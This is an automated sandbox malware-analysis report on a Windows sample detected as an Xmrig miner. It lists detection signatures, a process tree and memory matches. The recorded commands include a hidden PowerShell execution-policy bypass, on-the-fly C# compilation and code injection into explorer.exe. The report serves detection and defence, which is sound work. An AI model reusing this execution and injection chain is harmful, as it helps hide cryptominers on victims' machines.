Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
Analysis ID:1543709
MD5:58819721cbc16ea7033be23e69bd2058
SHA1:77659fce36b96a2b0de0f7079e057fd711900887
SHA256:ff7d03accac70da489c7f108fa7d7d5fb58e02bcc32f4933ed418451663cc74a
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6620 cmdline: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5468 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 1476 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 3364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wscript.exe (PID: 5940 cmdline: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 1628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1576 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.2.explorer.exe.29eb093b.8.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              11.2.explorer.exe.1063093b.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                11.2.explorer.exe.20d39ac0.2.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                  11.0.explorer.exe.1063093b.0.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                    11.2.explorer.exe.2acb0000.10.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: WScript or CScript Dropper
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 6620, ProcessName: wscript.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6620, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 5468, ProcessName: powershell.exe
                      Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", ProcessId: 1476, ProcessName: csc.exe
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 6620, ProcessName: wscript.exe
                      Sigma detected: Dynamic CSharp Compile Artefact
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5468, TargetFilename: C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs" "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6620, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ProcessId: 5468, ProcessName: powershell.exe

                      Data Obfuscation

                      barindex
                      Sigma detected: Dot net compiler compiles file from suspicious location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline", ProcessId: 1476, ProcessName: csc.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeAvira: detected
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dllAvira: detection malicious, Label: TR/Agent.btqep
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dllReversingLabs: Detection: 50%
                      Multi AV Scanner detection for submitted file
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeReversingLabs: Detection: 47%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

                      Bitcoin Miner

                      barindex
                      Yara detected Xmrig cryptocurrency miner
                      Source: Yara matchFile source: 11.2.explorer.exe.29eb093b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.1063093b.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.20d39ac0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.0.explorer.exe.1063093b.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.2acb0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.297b0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.3351232614.0000000010E18000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3355532590.000000002ACB0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3351232614.0000000010D31000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3353996348.0000000029EB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3350741583.0000000010630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: vp)[C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: explorer.exe, explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\winInfo.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, 00000000.00000002.2315556372.00007FF8A880A000.00000002.00000001.01000000.00000004.sdmp, winApps.dll.0.dr
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                      Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                      Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                      Source: explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                      Source: explorer.exe, 0000000B.00000002.3335335583.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 0000000B.00000003.3094867488.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: explorer.exe, 0000000B.00000002.3342474337.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165194690.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2165708418.0000000008870000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: powershell.exe, 00000007.00000002.2215473665.00000224425D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2278545178.00000289B2D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 0000000D.00000002.2278545178.00000289B2FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
